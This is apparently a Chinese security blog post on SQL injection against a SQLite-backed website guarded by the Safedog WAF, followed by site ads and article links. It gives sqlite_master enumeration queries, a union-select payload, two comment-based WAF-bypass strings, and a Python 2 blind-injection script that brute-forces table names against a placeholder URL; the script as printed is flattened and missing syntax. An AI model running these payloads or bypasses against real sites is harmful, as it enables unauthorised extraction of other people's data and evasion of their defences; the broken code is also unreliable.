Sqlite注入测试
测试了一个网站是Sqlite数据库,还装有安全狗,绕过了防护,找到Payload,写了一个Python脚本来跑表,这里总结一下:
取得sqlite数据库里所有的表名
查询table,type 段是'table',name段是table的名字,
so: select name from sqlite_master where type='table' order by name;
查询一条记录:select name from sqlite_master where type='table' order by name limit 0,1
sqlite_version(*) 返回SQLite的版本
与MySQL5.x类似的,Sqlite存在与information_schema类似的⼀一个表,默认并不显示,名为sqlite_master,表中的字段有type,name,tbl_name,rootpage,sql,⽐较有价值的是sql字段
union select 1,sql,2,3 from sqlite_master
绕过安全狗简单的两个方法:
/*'+'*/
/**a*/
#! /usr/bin/env python # _*_ coding:utf-8 _*_ import urllib import urllib2 payloads = '0123456789@_.abcdefghijklmnopqrstuvwxyz' header = { 'User-Agent' : 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)' } values={} print 'Start to retrive user:' user= '' for i in range(1, 15): for payload in payloads values['fromCity']="xxx'/**a*/and/**a*/"+"substr((select name from sqlite_master where type='table' order by name limit 0,1),%s,1)='%s'--" %(i,str(payload)) data = urllib.urlencode(values) url = "http://www.xxxx.com/xxxx.aspx" geturl = url+'?'+data request = urllib2.Request(geturl,headers=header) response = urllib2.urlopen(request,timeout=5) result=response.read() print '.', if result.count('HO1110')>0: user += payload print '\n\n[in progress]', user, break print '\n\n[Done] user is %s' % user
关于我:一个网络安全爱好者,致力于分享原创高质量干货,欢迎关注我的个人微信公众号:Bypass--,浏览更多精彩文章。
参考文章:
PHP/Sqlite下常见漏洞浅析:http://www.2cto.com/Article/201410/342032.html
本文由Bypass整理发布,转载请保留出处。
欢迎关注我的个人微信公众号:Bypass--,浏览更多精彩文章。
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· .NET Core 中如何实现缓存的预热?
· 从 HTTP 原因短语缺失研究 HTTP/2 和 HTTP/3 的设计差异
· AI与.NET技术实操系列:向量存储与相似性搜索在 .NET 中的实现
· 基于Microsoft.Extensions.AI核心库实现RAG应用
· Linux系列:如何用heaptrack跟踪.NET程序的非托管内存泄露
· TypeScript + Deepseek 打造卜卦网站:技术与玄学的结合
· 阿里巴巴 QwQ-32B真的超越了 DeepSeek R-1吗?
· 【译】Visual Studio 中新的强大生产力特性
· 2025年我用 Compose 写了一个 Todo App
· 张高兴的大模型开发实战:(一)使用 Selenium 进行网页爬虫